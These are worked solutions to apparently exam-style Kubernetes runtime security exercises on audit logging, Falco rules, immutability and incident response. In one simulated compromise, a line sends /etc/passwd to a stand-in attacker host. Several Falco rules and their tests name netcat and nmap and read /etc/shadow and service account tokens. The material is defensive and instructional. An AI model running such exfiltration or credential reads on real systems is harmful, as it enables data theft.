Solutions: Monitoring, Logging and Runtime Security
INFO
These solutions provide step-by-step instructions for each practice question. Try to solve each question on your own before checking the solution. Each solution includes verification steps and exam tips.
Solution 1: Basic Audit Policy Creation
Step-by-Step
# Create the directory
sudo mkdir -p /etc/kubernetes/audit
Create the audit policy file at /etc/kubernetes/audit/policy.yaml:
apiVersion: audit.k8s.io/v1
kind: Policy
# Do not log RequestReceived stage
omitStages:
- "RequestReceived"
rules:
# Rule 1: Log all Secret operations at Metadata level
- level: Metadata
resources:
- group: ""
resources: ["secrets"]
# Rule 2: Log namespace create and delete at RequestResponse level
- level: RequestResponse
resources:
- group: ""
resources: ["namespaces"]
verbs: ["create", "delete"]
# Rule 3: Catch-all -- log everything else at Metadata level
- level: Metadata
Verification
# Validate the YAML syntax
python3 -c "import yaml; yaml.safe_load(open('/etc/kubernetes/audit/policy.yaml'))"
Exam Tip
Always remember three things about audit policies:
- Rules are evaluated top-down -- first match wins
- apiVersion must be audit.k8s.io/v1 and kind must be Policy
- Include a catch-all rule at the end to avoid silently dropping events
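As an illustration of the first point (not part of the solution), placing the catch-all rule first would shadow every later rule:
rules:
# WRONG: catch-all first -- it matches every request at Metadata level,
# so the namespace rule below is never reached
- level: Metadata
- level: RequestResponse
  resources:
  - group: ""
    resources: ["namespaces"]
  verbs: ["create", "delete"]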
Solution 2: Enable Audit Logging on API Server
Step-by-Step
# Create the audit log directory
sudo mkdir -p /var/log/kubernetes/audit
Edit the API server manifest at /etc/kubernetes/manifests/kube-apiserver.yaml:
sudo vi /etc/kubernetes/manifests/kube-apiserver.yaml
Add the following flags to the kube-apiserver command:
- --audit-policy-file=/etc/kubernetes/audit/policy.yaml
- --audit-log-path=/var/log/kubernetes/audit/audit.log
- --audit-log-maxage=30
- --audit-log-maxbackup=5
- --audit-log-maxsize=100
Add the following volume mounts to the container:
volumeMounts:
# ... existing mounts ...
- name: audit-policy
mountPath: /etc/kubernetes/audit/policy.yaml
readOnly: true
- name: audit-log
mountPath: /var/log/kubernetes/audit
Add the following volumes to the pod spec:
volumes:
# ... existing volumes ...
- name: audit-policy
hostPath:
path: /etc/kubernetes/audit/policy.yaml
type: File
- name: audit-log
hostPath:
path: /var/log/kubernetes/audit
type: DirectoryOrCreate
Verification
# Wait for the API server to restart (may take 30-60 seconds)
# Check API server status
kubectl get nodes
# If the API server does not come back, check the static pod logs:
# For Kind clusters:
docker exec kind-control-plane crictl logs $(docker exec kind-control-plane crictl ps -a --name kube-apiserver -q | head -1)
# Verify audit log is being written
ls -la /var/log/kubernetes/audit/audit.log
# Check that events are being recorded
tail -5 /var/log/kubernetes/audit/audit.log | jq .
Common Mistakes
- Forgetting to add BOTH the volume and the volumeMount
- Using type: Directory instead of type: File for the policy file
- Using type: Directory instead of type: DirectoryOrCreate for the log directory
- Typos in the mount path or host path
- Not making the policy file mount readOnly: true
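A quick way to catch most of these mistakes before waiting out an API server restart is to grep the manifest for the flag, mount, and volume entries (a rough sanity check, assuming the default kubeadm manifest path):
grep -n "audit-policy-file\|audit-log-path" /etc/kubernetes/manifests/kube-apiserver.yaml
grep -n "name: audit-policy\|name: audit-log" /etc/kubernetes/manifests/kube-apiserver.yaml
grep -n "type: File\|type: DirectoryOrCreate" /etc/kubernetes/manifests/kube-apiserver.yaml
# Expect audit-policy and audit-log to appear twice each: once under volumeMounts, once under volumes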
Solution 3: Advanced Audit Policy
Step-by-Step
Create /etc/kubernetes/audit/policy-advanced.yaml:
apiVersion: audit.k8s.io/v1
kind: Policy
# Omit RequestReceived stage globally
omitStages:
- "RequestReceived"
rules:
# Rule 1: Do NOT log get/list/watch on endpoints or services
- level: None
resources:
- group: ""
resources: ["endpoints", "services", "services/status"]
verbs: ["get", "list", "watch"]
# Rule 2: Do NOT log requests to non-resource URLs
- level: None
nonResourceURLs:
- "/api*"
- "/healthz*"
- "/version"
# Rule 3: Log Secret operations at Metadata level only
# (Never use Request/RequestResponse for Secrets -- it would log secret values)
- level: Metadata
resources:
- group: ""
resources: ["secrets"]
# Rule 4: Log RBAC modifications at RequestResponse level
- level: RequestResponse
resources:
- group: "rbac.authorization.k8s.io"
resources: ["roles", "rolebindings", "clusterroles", "clusterrolebindings"]
verbs: ["create", "update", "patch", "delete"]
# Rule 5: Log pods/exec, pods/attach, pods/portforward at Metadata level
- level: Metadata
resources:
- group: ""
resources: ["pods/exec", "pods/attach", "pods/portforward"]
# Rule 6: Catch-all -- log everything else at Metadata level
- level: Metadata
Verification
# Validate YAML
python3 -c "import yaml; yaml.safe_load(open('/etc/kubernetes/audit/policy-advanced.yaml'))"
echo "Policy file is valid YAML"Exam Tip
When creating an advanced audit policy, write rules in this order:
- None rules first (what to exclude)
- Specific high-detail rules (RequestResponse for RBAC)
- Specific medium-detail rules (Metadata for Secrets)
- Catch-all rule last (Metadata for everything else)
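Once this policy is wired into the API server (reusing the flags and audit log path from Solution 2 -- an assumption, since this solution only writes the policy file), a quick spot-check confirms the None rules and the catch-all behave as intended:
kubectl get endpoints -A > /dev/null
kubectl get secrets -A > /dev/null
# endpoints reads should be excluded; secrets reads should be present
grep -c '"resource":"endpoints"' /var/log/kubernetes/audit/audit.log
grep -c '"resource":"secrets"' /var/log/kubernetes/audit/audit.log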
Solution 4: Audit Log Investigation
Step-by-Step
# Create investigation directory
mkdir -p /tmp/investigation
# Find the deletion event
cat /var/log/kubernetes/audit/audit.log | jq '
select(
.objectRef.resource == "deployments" and
.objectRef.name == "webapp" and
.objectRef.namespace == "production" and
.verb == "delete" and
.stage == "ResponseComplete"
)' > /tmp/investigation/deletion-event.json
# Extract key details
cat /tmp/investigation/deletion-event.json | jq '{
username: .user.username,
sourceIP: .sourceIPs[0],
timestamp: .requestReceivedTimestamp,
responseCode: .responseStatus.code
}'
If No Audit Logs Exist Yet (Simulation)
# If you need to generate test data, first enable audit logging,
# then create and delete a test deployment:
kubectl create namespace production
kubectl create deployment webapp --image=nginx -n production
kubectl delete deployment webapp -n production
# Then run the investigation commands above
Exam Tip
Key jq filters for audit log investigation:
- .objectRef.resource -- filter by resource type
- .objectRef.name -- filter by resource name
- .objectRef.namespace -- filter by namespace
- .verb -- filter by action (create, update, delete, get, etc.)
- .user.username -- filter by who performed the action
- .sourceIPs -- filter by source IP
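These filters compose naturally. For example, a sketch that counts delete operations per user across the whole log (same jq style as Solution 12):
cat /var/log/kubernetes/audit/audit.log | jq -s '
  [.[] | select(.verb == "delete" and .stage == "ResponseComplete")] |
  group_by(.user.username) |
  map({user: .[0].user.username, deletes: length}) |
  sort_by(-.deletes)'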
Solution 5: Falco Rule for Shell Detection
Step-by-Step
Create or edit /etc/falco/falco_rules.local.yaml:
- list: shell_binaries
items:
- bash
- sh
- dash
- zsh
- macro: container
condition: (container.id != host)
- macro: spawned_process
condition: (evt.type in (execve, execveat) and evt.dir=<)
- rule: Detect Shell in Container
desc: >
Detects when an interactive shell (bash, sh, dash, zsh) is
spawned inside any container.
condition: >
spawned_process and
container and
proc.name in (shell_binaries)
output: >
Shell spawned in container
(user=%user.name shell=%proc.name
container=%container.name
pod=%k8s.pod.name ns=%k8s.ns.name
cmdline=%proc.cmdline)
priority: WARNING
tags: [shell, container]
# Validate the rule file
falco -V /etc/falco/falco_rules.local.yaml
# Restart Falco
sudo systemctl restart falco
# Check Falco is running
sudo systemctl status falco
Testing
# Create a test pod
kubectl run test-shell --image=nginx
# Wait for it to be ready
kubectl wait --for=condition=ready pod/test-shell
# Trigger the rule by exec-ing a shell
kubectl exec -it test-shell -- bash
# Check Falco alerts
sudo journalctl -u falco --since "2 minutes ago" | grep "Shell spawned"
# Clean up
kubectl delete pod test-shell
Solution 6: Falco Rule for Sensitive File Access
Step-by-Step
Add to /etc/falco/falco_rules.local.yaml:
- rule: Shadow File Read in Container
desc: >
Detects when any process reads /etc/shadow inside a container.
This file contains password hashes and should not be read by
application processes.
condition: >
evt.type in (open, openat, openat2) and
evt.is_open_read=true and
container.id != host and
fd.name=/etc/shadow
output: >
/etc/shadow read in container
(process=%proc.name user=%user.name
container=%container.name
pod=%k8s.pod.name ns=%k8s.ns.name
image=%container.image.repository)
priority: ERROR
tags: [filesystem, sensitive_files, container]
# Validate and restart
falco -V /etc/falco/falco_rules.local.yaml
sudo systemctl restart falco
Testing
# Create a test pod
kubectl run test-shadow --image=nginx
# Wait for it to be ready
kubectl wait --for=condition=ready pod/test-shadow
# Trigger the rule
kubectl exec test-shadow -- cat /etc/shadow
# Check Falco alerts
sudo journalctl -u falco --since "2 minutes ago" | grep "shadow"
# Clean up
kubectl delete pod test-shadow
Solution 7: Falco Rule for Package Manager Detection
Step-by-Step
Create /etc/falco/rules.d/package-manager.yaml:
- list: package_mgr_binaries
items:
- apt
- apt-get
- dpkg
- yum
- rpm
- pip
- pip3
- npm
- apk
- rule: Package Manager Launched in Container
desc: >
Detects execution of package management tools inside containers.
Containers should be immutable and not install packages at runtime.
condition: >
evt.type in (execve, execveat) and
evt.dir=< and
container.id != host and
proc.name in (package_mgr_binaries)
output: >
Package manager launched in container
(package_manager=%proc.name cmdline=%proc.cmdline
container=%container.name
pod=%k8s.pod.name ns=%k8s.ns.name
image=%container.image.repository)
priority: CRITICAL
tags: [package_manager, immutability, container]
# Restart Falco to load the new rules file
sudo systemctl restart falco
# Verify the rules directory is in falco.yaml
grep "rules.d" /etc/falco/falco.yaml
# Should show: - /etc/falco/rules.d
# Verify Falco loaded the rule
sudo journalctl -u falco --since "1 minute ago" | grep -i "package"Testing
kubectl run test-pkg --image=nginx
kubectl wait --for=condition=ready pod/test-pkg
kubectl exec test-pkg -- apt-get update
sudo journalctl -u falco --since "2 minutes ago" | grep "Package manager"
kubectl delete pod test-pkg
Solution 8: Investigate Falco Alerts
Step-by-Step
# Step 1: Check Falco alerts from the last hour
sudo journalctl -u falco --since "1 hour ago" --no-pager | \
grep -E "WARNING|ERROR|CRITICAL"
# Or if Falco outputs to a file:
tail -100 /var/log/falco/falco_alerts.log | grep "web-app"
# Step 2: Identify the container and process
# Look for container name, pod name, process name in the alert output
# Example alert:
# WARNING Shell spawned in container
# (user=root shell=bash container=web-app pod=web-app ns=default cmdline=bash)
# Step 3: Investigate the pod
kubectl get pod web-app -n default -o yaml
kubectl exec web-app -n default -- ps aux
# Step 4: Check /tmp directory
kubectl exec web-app -n default -- ls -la /tmp/
# Step 5: Record findings
mkdir -p /tmp/investigation
cat > /tmp/investigation/falco-findings.txt << EOF
Falco Investigation Report
==========================
Date: $(date)
Pod: web-app
Namespace: default
Container: web-app
Findings:
1. Falco detected shell (bash) spawned in the container
2. Process running as root user
3. Files found in /tmp:
- (list files found)
4. Processes running:
- (list from ps aux output)
Recommendation:
- Apply readOnlyRootFilesystem to prevent filesystem modifications
- Investigate the source of shell access
- Review RBAC permissions for exec access to this pod
EOF
Solution 9: Container Immutability - Fix a Pod
Step-by-Step
# First, check the current pod spec
kubectl get pod mutable-app -o yaml > /tmp/mutable-app-backup.yaml
# Get the image name
IMAGE=$(kubectl get pod mutable-app -o jsonpath='{.spec.containers[0].image}')
# Delete the existing pod
kubectl delete pod mutable-app
# Recreate with immutable settings
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
name: mutable-app
namespace: default
spec:
containers:
- name: app
image: $IMAGE
securityContext:
readOnlyRootFilesystem: true
volumeMounts:
- name: tmp
mountPath: /tmp
- name: var-cache
mountPath: /var/cache
volumes:
- name: tmp
emptyDir: {}
- name: var-cache
emptyDir: {}
EOF
Verification
# Check the pod is running
kubectl get pod mutable-app
# Verify readOnlyRootFilesystem is set
kubectl get pod mutable-app -o jsonpath='{.spec.containers[0].securityContext.readOnlyRootFilesystem}'
# Should output: true
# Verify /tmp is writable
kubectl exec mutable-app -- touch /tmp/test-file
echo "tmp is writable: OK"
# Verify root filesystem is read-only
kubectl exec mutable-app -- touch /test-file 2>&1 || echo "Root filesystem is read-only: OK"
Exam Tip
If the question says "same configuration," make sure to preserve the original image, labels, ports, and other settings. Use kubectl get pod -o yaml to capture the full spec before deleting.
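One way to do that is to save the manifest first, edit the saved copy, and re-apply it -- a sketch, assuming you strip the runtime-only fields before applying:
kubectl get pod mutable-app -o yaml > /tmp/mutable-app.yaml
# Edit the copy: remove status, nodeName, resourceVersion, uid, etc.,
# then add securityContext, volumeMounts, and volumes
vi /tmp/mutable-app.yaml
kubectl delete pod mutable-app
kubectl apply -f /tmp/mutable-app.yaml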
Solution 10: Container Immutability - Nginx
Step-by-Step
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
name: immutable-nginx
namespace: default
spec:
containers:
- name: nginx
image: nginx:1.25
ports:
- containerPort: 80
securityContext:
readOnlyRootFilesystem: true
allowPrivilegeEscalation: false
volumeMounts:
- name: tmp
mountPath: /tmp
- name: var-run
mountPath: /var/run
- name: var-cache-nginx
mountPath: /var/cache/nginx
- name: var-log-nginx
mountPath: /var/log/nginx
volumes:
- name: tmp
emptyDir: {}
- name: var-run
emptyDir: {}
- name: var-cache-nginx
emptyDir: {}
- name: var-log-nginx
emptyDir: {}
EOF
Verification
# Check pod is running
kubectl get pod immutable-nginx
kubectl wait --for=condition=ready pod/immutable-nginx
# Verify nginx is serving
kubectl exec immutable-nginx -- curl -s localhost:80 | head -5
# Verify root filesystem is read-only
kubectl exec immutable-nginx -- touch /usr/share/nginx/html/test.html 2>&1
# Should fail with "Read-only file system"
# Verify writable directories work
kubectl exec immutable-nginx -- touch /tmp/test
kubectl exec immutable-nginx -- touch /var/cache/nginx/test
echo "All verifications passed"Exam Tip
Nginx requires four writable directories: /tmp, /var/run (for PID file), /var/cache/nginx (for proxy cache), and /var/log/nginx (for access/error logs). Memorize these for the exam.
Solution 11: Forensic Investigation - Suspicious Container
Step-by-Step
# Step 1: Set up the scenario
kubectl create namespace investigation
kubectl run suspicious-app --image=nginx:1.25 -n investigation
kubectl wait --for=condition=ready pod/suspicious-app -n investigation
# Step 2: Simulate compromise
kubectl exec suspicious-app -n investigation -- bash -c "
apt-get update -qq && apt-get install -y -qq curl > /dev/null 2>&1
curl -s -o /tmp/payload http://example.com
echo 'malicious' > /tmp/backdoor.sh
chmod +x /tmp/backdoor.sh
"
# Step 3: Investigate from the host
mkdir -p /tmp/investigation
# For Kind cluster, exec into the node:
# docker exec -it kind-control-plane bash
# Find the container ID
CONTAINER_ID=$(crictl ps --name suspicious-app -q)
echo "Container ID: $CONTAINER_ID" | tee /tmp/investigation/forensics-report.txt
# Get host PID
PID=$(crictl inspect $CONTAINER_ID | jq .info.pid)
echo "Host PID: $PID" | tee -a /tmp/investigation/forensics-report.txt
# List processes
echo "=== Running Processes ===" | tee -a /tmp/investigation/forensics-report.txt
crictl exec $CONTAINER_ID ps aux | tee -a /tmp/investigation/forensics-report.txt
# Check /tmp directory
echo "=== Files in /tmp ===" | tee -a /tmp/investigation/forensics-report.txt
crictl exec $CONTAINER_ID ls -la /tmp/ | tee -a /tmp/investigation/forensics-report.txt
# Check for suspicious files
echo "=== Suspicious file content ===" | tee -a /tmp/investigation/forensics-report.txt
crictl exec $CONTAINER_ID cat /tmp/backdoor.sh | tee -a /tmp/investigation/forensics-report.txt
# Check environment
echo "=== Container Environment ===" | tee -a /tmp/investigation/forensics-report.txt
crictl inspect $CONTAINER_ID | jq '.info.config.envs' | tee -a /tmp/investigation/forensics-report.txt
# Alternative: Investigate via /proc from host
echo "=== Process via /proc ===" | tee -a /tmp/investigation/forensics-report.txt
cat /proc/$PID/cmdline | tr '\0' ' ' | tee -a /tmp/investigation/forensics-report.txt
echo "" | tee -a /tmp/investigation/forensics-report.txt
ls -la /proc/$PID/root/tmp/ | tee -a /tmp/investigation/forensics-report.txt
Solution 12: Audit Log Analysis - Secret Access
Step-by-Step
mkdir -p /tmp/investigation
# Find all Secret get/list operations grouped by user
cat /var/log/kubernetes/audit/audit.log | jq -s '
[.[] | select(
.objectRef.resource == "secrets" and
(.verb == "get" or .verb == "list")
)] |
group_by(.user.username) |
map({
user: .[0].user.username,
count: length,
namespaces: [.[] | .objectRef.namespace] | unique,
secrets: [.[] | .objectRef.name // "all"] | unique
}) |
sort_by(-.count)
' > /tmp/investigation/secret-access.txt
# Find cross-namespace Secret access
cat /var/log/kubernetes/audit/audit.log | jq '
select(
.objectRef.resource == "secrets" and
(.verb == "get" or .verb == "list")
) | {
user: .user.username,
secret: .objectRef.name,
namespace: .objectRef.namespace,
sourceIP: .sourceIPs[0],
time: .requestReceivedTimestamp
}
' >> /tmp/investigation/secret-access.txt
echo "Analysis saved to /tmp/investigation/secret-access.txt"
cat /tmp/investigation/secret-access.txt
Exam Tip
When analyzing Secret access patterns, look for:
- Service accounts accessing Secrets outside their namespace
- Unusual users listing all Secrets (.objectRef.name is null for list operations)
- High frequency of Secret reads from a single source
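For the first point, service account usernames follow the pattern system:serviceaccount:<namespace>:<name>, so a rough sketch like the following flags service accounts reading Secrets outside their own namespace (illustrative only; cluster-scoped list requests show up with a null namespace):
cat /var/log/kubernetes/audit/audit.log | jq '
  select(
    .objectRef.resource == "secrets" and
    (.verb == "get" or .verb == "list") and
    (.user.username | startswith("system:serviceaccount:")) and
    (.user.username | split(":")[2]) != .objectRef.namespace
  ) | {user: .user.username, namespace: .objectRef.namespace, secret: .objectRef.name}'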
Solution 13: Behavioral Analytics - Lateral Movement Detection
Step-by-Step
Create /etc/falco/rules.d/lateral-movement.yaml:
# Rule 1: Detect service account token reads
- rule: Service Account Token Read
desc: >
Detects when a process inside a container reads the Kubernetes
service account token. This may indicate lateral movement
preparation.
condition: >
evt.type in (open, openat, openat2) and
evt.is_open_read=true and
container.id != host and
fd.name startswith /var/run/secrets/kubernetes.io/serviceaccount/token
output: >
Service account token read in container
(process=%proc.name command=%proc.cmdline
container=%container.name
pod=%k8s.pod.name ns=%k8s.ns.name
image=%container.image.repository)
priority: WARNING
tags: [lateral_movement, credential_access, container]
# Rule 2: Detect network scanning tools
- list: network_scanning_tools
items:
- nmap
- masscan
- nc
- ncat
- netcat
- rule: Network Scanning Tool in Container
desc: >
Detects execution of network scanning tools inside containers.
This is a strong indicator of lateral movement attempts.
condition: >
evt.type in (execve, execveat) and
evt.dir=< and
container.id != host and
proc.name in (network_scanning_tools)
output: >
Network scanning tool launched in container
(tool=%proc.name cmdline=%proc.cmdline
container=%container.name
pod=%k8s.pod.name ns=%k8s.ns.name
image=%container.image.repository)
priority: CRITICAL
tags: [lateral_movement, network_scanning, container]
# Restart Falco
sudo systemctl restart falco
# Verify rules are loaded
sudo journalctl -u falco --since "1 minute ago" | grep -i "rule"
# Test the token read rule
kubectl run test-lateral --image=nginx
kubectl wait --for=condition=ready pod/test-lateral
kubectl exec test-lateral -- cat /var/run/secrets/kubernetes.io/serviceaccount/token
# Check alerts
sudo journalctl -u falco --since "2 minutes ago" | grep -i "service account token\|network scanning"
# Clean up
kubectl delete pod test-lateral
Solution 14: Combined - Audit Policy and Investigation
Step-by-Step
Part 1: Create the audit policy
Create /etc/kubernetes/audit/incident-policy.yaml:
apiVersion: audit.k8s.io/v1
kind: Policy
omitStages:
- "RequestReceived"
rules:
# Log pods/exec at RequestResponse level
- level: RequestResponse
resources:
- group: ""
resources: ["pods/exec", "pods/attach"]
# Log Secret operations at Metadata level
- level: Metadata
resources:
- group: ""
resources: ["secrets"]
# Log RBAC changes at RequestResponse level
- level: RequestResponse
resources:
- group: "rbac.authorization.k8s.io"
resources: ["roles", "rolebindings", "clusterroles", "clusterrolebindings"]
verbs: ["create", "update", "patch", "delete"]
# Catch-all
- level: Metadata
Part 2: Configure the API server
Edit /etc/kubernetes/manifests/kube-apiserver.yaml and add:
Flags:
- --audit-policy-file=/etc/kubernetes/audit/incident-policy.yaml
- --audit-log-path=/var/log/kubernetes/audit/incident.log
- --audit-log-maxage=30
- --audit-log-maxbackup=5
- --audit-log-maxsize=100
Volume mounts:
- name: audit-policy
mountPath: /etc/kubernetes/audit/incident-policy.yaml
readOnly: true
- name: audit-log
mountPath: /var/log/kubernetes/audit
Volumes:
- name: audit-policy
hostPath:
path: /etc/kubernetes/audit/incident-policy.yaml
type: File
- name: audit-log
hostPath:
path: /var/log/kubernetes/audit
type: DirectoryOrCreate
Part 3: Verify
# Wait for API server restart
sleep 30
kubectl get nodes
# Create a secret
kubectl create secret generic test-secret --from-literal=key=value
# Create a test pod and exec into it
kubectl run audit-test --image=nginx
kubectl wait --for=condition=ready pod/audit-test
kubectl exec audit-test -- whoami
# Check audit log
tail -20 /var/log/kubernetes/audit/incident.log | jq -r '.verb + " " + (.objectRef.resource // "non-resource")'
# Verify Secret creation was logged
cat /var/log/kubernetes/audit/incident.log | jq 'select(.objectRef.resource=="secrets" and .objectRef.name=="test-secret")'
# Verify exec was logged
cat /var/log/kubernetes/audit/incident.log | jq 'select(.objectRef.subresource=="exec")'
# Clean up
kubectl delete pod audit-test
kubectl delete secret test-secret
Solution 15: Immutability Enforcement with Pod Security Standards
Step-by-Step
# Step 1: Create namespace with restricted PSS
kubectl apply -f - <<EOF
apiVersion: v1
kind: Namespace
metadata:
name: restricted-ns
labels:
pod-security.kubernetes.io/enforce: restricted
pod-security.kubernetes.io/enforce-version: latest
pod-security.kubernetes.io/warn: restricted
pod-security.kubernetes.io/warn-version: latest
EOF
# Step 2: Attempt to create a non-compliant pod (should be rejected)
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
name: non-compliant
namespace: restricted-ns
spec:
containers:
- name: app
image: nginx:1.25
EOF
# This should be REJECTED with a message about violations
# Step 3: Create a compliant pod
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
name: compliant-pod
namespace: restricted-ns
spec:
securityContext:
runAsNonRoot: true
runAsUser: 1000
seccompProfile:
type: RuntimeDefault
containers:
- name: app
image: python:3.11-slim
command: ["python", "-m", "http.server", "8080"]
securityContext:
readOnlyRootFilesystem: true
allowPrivilegeEscalation: false
capabilities:
drop:
- ALL
ports:
- containerPort: 8080
volumeMounts:
- name: tmp
mountPath: /tmp
volumes:
- name: tmp
emptyDir: {}
EOF
Verification
# Verify the non-compliant pod was rejected
kubectl get pods -n restricted-ns
# Should NOT show "non-compliant"
# Verify the compliant pod is running
kubectl get pod compliant-pod -n restricted-ns
kubectl wait --for=condition=ready pod/compliant-pod -n restricted-ns --timeout=60s
# Verify security settings
kubectl get pod compliant-pod -n restricted-ns -o jsonpath='{.spec.containers[0].securityContext}' | jq .
Exam Tip
The restricted PSS profile requires:
- runAsNonRoot: true
- allowPrivilegeEscalation: false
- capabilities.drop: [ALL]
- seccompProfile.type: RuntimeDefault or Localhost
- No privileged containers
- No hostPath, hostNetwork, hostPID, hostIPC
Note: readOnlyRootFilesystem is NOT enforced by PSS, but is a security best practice.
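A related check worth knowing: labeling namespaces in server-side dry-run mode reports which existing pods would violate the profile, without enforcing anything (this relies on the built-in Pod Security admission controller, enabled by default on current clusters):
# Preview restricted-profile violations across all namespaces without changing any labels
kubectl label --dry-run=server --overwrite ns --all \
  pod-security.kubernetes.io/enforce=restricted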
Solution 16: Falco - Modify Output Format
Step-by-Step
# Edit Falco configuration
sudo vi /etc/falco/falco.yaml
Make these changes in /etc/falco/falco.yaml:
# Enable JSON output
json_output: true
json_include_output_property: true
json_include_tags_property: true
# Keep stdout enabled
stdout_output:
enabled: true
# Enable file output
file_output:
enabled: true
keep_alive: false
filename: /var/log/falco/alerts.json
# Create the output directory
sudo mkdir -p /var/log/falco
# Restart Falco
sudo systemctl restart falco
# Verify Falco is running
sudo systemctl status falco
Testing
# Create a test pod and trigger a shell alert
kubectl run test-json --image=nginx
kubectl wait --for=condition=ready pod/test-json
kubectl exec test-json -- bash -c "echo test"
# Check JSON output in the file
sleep 5
cat /var/log/falco/alerts.json | jq .
# Filter for the shell alert (case-insensitive match on the output field)
cat /var/log/falco/alerts.json | jq 'select(.output | test("shell"; "i"))'
# Clean up
kubectl delete pod test-json
Solution 17: Forensic Investigation - Network Analysis
Step-by-Step
# Step 1: Create the pod
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
name: network-suspect
namespace: default
labels:
app: network-suspect
spec:
containers:
- name: nginx
image: nginx:1.25
ports:
- containerPort: 80
EOF
kubectl wait --for=condition=ready pod/network-suspect
# Step 2: Simulate suspicious activity
kubectl exec network-suspect -- bash -c "apt-get update -qq && apt-get install -y -qq curl > /dev/null 2>&1"
kubectl exec network-suspect -- curl -s http://example.com > /dev/null
# Step 3: Investigate from the host
# For Kind: docker exec -it kind-control-plane bash
CONTAINER_ID=$(crictl ps --name network-suspect -q)
PID=$(crictl inspect $CONTAINER_ID | jq .info.pid)
echo "Container ID: $CONTAINER_ID"
echo "Host PID: $PID"
# Check active network connections
echo "=== Active Connections ==="
nsenter -t $PID -n ss -tuanp
# Check listening ports
echo "=== Listening Ports ==="
nsenter -t $PID -n ss -tlnp
# Check processes with network activity
echo "=== Processes ==="
crictl exec $CONTAINER_ID ps aux
# Step 4: Create isolating NetworkPolicy
kubectl apply -f - <<EOF
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: isolate-network-suspect
namespace: default
spec:
podSelector:
matchLabels:
app: network-suspect
policyTypes:
- Ingress
- Egress
# No ingress or egress rules = deny all traffic
EOF
# Step 5: Verify isolation
kubectl exec network-suspect -- curl -s --connect-timeout 5 http://example.com 2>&1 || echo "Connection blocked: NetworkPolicy is working"
Solution 18: sysdig Investigation
Step-by-Step
# Step 1: Create the pod
kubectl run monitored-app --image=nginx:1.25
kubectl wait --for=condition=ready pod/monitored-app
# Step 2: Write sysdig commands
mkdir -p /tmp/investigation
cat > /tmp/investigation/sysdig-commands.txt << 'EOF'
# Monitor all file open events in the monitored-app container
sysdig evt.type in (open, openat, openat2) and container.name=monitored-app
# With formatted output:
sysdig -p "%evt.time %proc.name %fd.name" "evt.type in (open, openat, openat2) and container.name=monitored-app"
# Monitor all process execution events in the monitored-app container
sysdig evt.type in (execve, execveat) and container.name=monitored-app
# With formatted output:
sysdig -p "%evt.time %proc.name %proc.cmdline" "evt.type in (execve, execveat) and evt.dir=< and container.name=monitored-app"
# Monitor all network connection events in the monitored-app container
sysdig evt.type=connect and container.name=monitored-app
# With formatted output:
sysdig -p "%evt.time %proc.name %fd.name" "evt.type=connect and evt.dir=< and container.name=monitored-app"
# Comprehensive monitoring (all three in one command):
sysdig -p "%evt.time %evt.type %proc.name %proc.cmdline %fd.name" "container.name=monitored-app and (evt.type in (open, openat, execve, connect))"
# Using spy_users chisel to see all commands:
sysdig -c spy_users container.name=monitored-app
EOF
echo "Commands saved to /tmp/investigation/sysdig-commands.txt"
cat /tmp/investigation/sysdig-commands.txt
Exam Tip
You may not need to actually run sysdig in the exam -- you might just need to write the correct command. Key syntax to remember:
- container.name=<name> to filter by container
- evt.type=<type> to filter by syscall
- -p "<format>" for custom output format
- -c spy_users for the interactive commands chisel
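If the task asks for offline analysis rather than live monitoring, sysdig can also record events to a capture file and replay them later (a sketch; the capture file name is arbitrary):
# Record events for the container to a capture file (Ctrl+C to stop)
sysdig -w /tmp/investigation/monitored-app.scap container.name=monitored-app
# Replay the capture offline with a custom output format
sysdig -r /tmp/investigation/monitored-app.scap -p "%evt.time %proc.name %evt.type %fd.name"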
Solution 19: Combined - Full Incident Response
Step-by-Step
# Step 1: Set up the scenario
kubectl create namespace production
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
name: app-server
namespace: production
labels:
app: app-server
spec:
containers:
- name: app
image: nginx:1.25
ports:
- containerPort: 80
EOF
kubectl wait --for=condition=ready pod/app-server -n production
# Step 2: Simulate compromise
kubectl exec app-server -n production -- bash -c "
echo '#!/bin/bash
curl http://evil.example.com/exfiltrate -d @/etc/passwd' > /tmp/malware.sh
chmod +x /tmp/malware.sh
apt-get update -qq > /dev/null 2>&1
apt-get install -y -qq curl > /dev/null 2>&1
"
# Step 3: Incident Response - Evidence Collection
mkdir -p /tmp/evidence
# Collect pod logs
kubectl logs app-server -n production > /tmp/evidence/pod-logs.txt
# Collect pod spec
kubectl get pod app-server -n production -o yaml > /tmp/evidence/pod-spec.yaml
# Collect running processes
kubectl exec app-server -n production -- ps aux > /tmp/evidence/processes.txt
# Collect filesystem changes
kubectl exec app-server -n production -- ls -la /tmp/ > /tmp/evidence/tmp-files.txt
kubectl exec app-server -n production -- cat /tmp/malware.sh > /tmp/evidence/malware-content.txt
# Collect network state
kubectl exec app-server -n production -- ss -tuanp > /tmp/evidence/network.txt 2>/dev/null || \
kubectl exec app-server -n production -- netstat -tuanp > /tmp/evidence/network.txt 2>/dev/null || \
echo "Network tools not available" > /tmp/evidence/network.txt
# Collect events
kubectl get events -n production --sort-by=.lastTimestamp > /tmp/evidence/events.txt
# Document timeline
cat > /tmp/evidence/timeline.txt << 'EOF'
Incident Timeline
=================
1. Pod app-server deployed in production namespace
2. Attacker gained shell access (detected by Falco or exec audit)
3. Attacker created malware script at /tmp/malware.sh
4. Attacker installed curl via apt-get (package manager activity detected)
5. Malware script designed to exfiltrate /etc/passwd to external server
Evidence Collected:
- Pod logs: pod-logs.txt
- Pod specification: pod-spec.yaml
- Running processes: processes.txt
- /tmp files: tmp-files.txt
- Malware content: malware-content.txt
- Network state: network.txt
- Events: events.txt
EOF
# Create isolating NetworkPolicy
kubectl apply -f - <<EOF
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: isolate-app-server
namespace: production
spec:
podSelector:
matchLabels:
app: app-server
policyTypes:
- Ingress
- Egress
EOF
echo "Evidence collected and pod isolated"
# Step 4: Remediate
# Delete compromised pod
kubectl delete pod app-server -n production
# Recreate with immutable settings
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
name: app-server
namespace: production
labels:
app: app-server
spec:
containers:
- name: app
image: nginx:1.25
ports:
- containerPort: 80
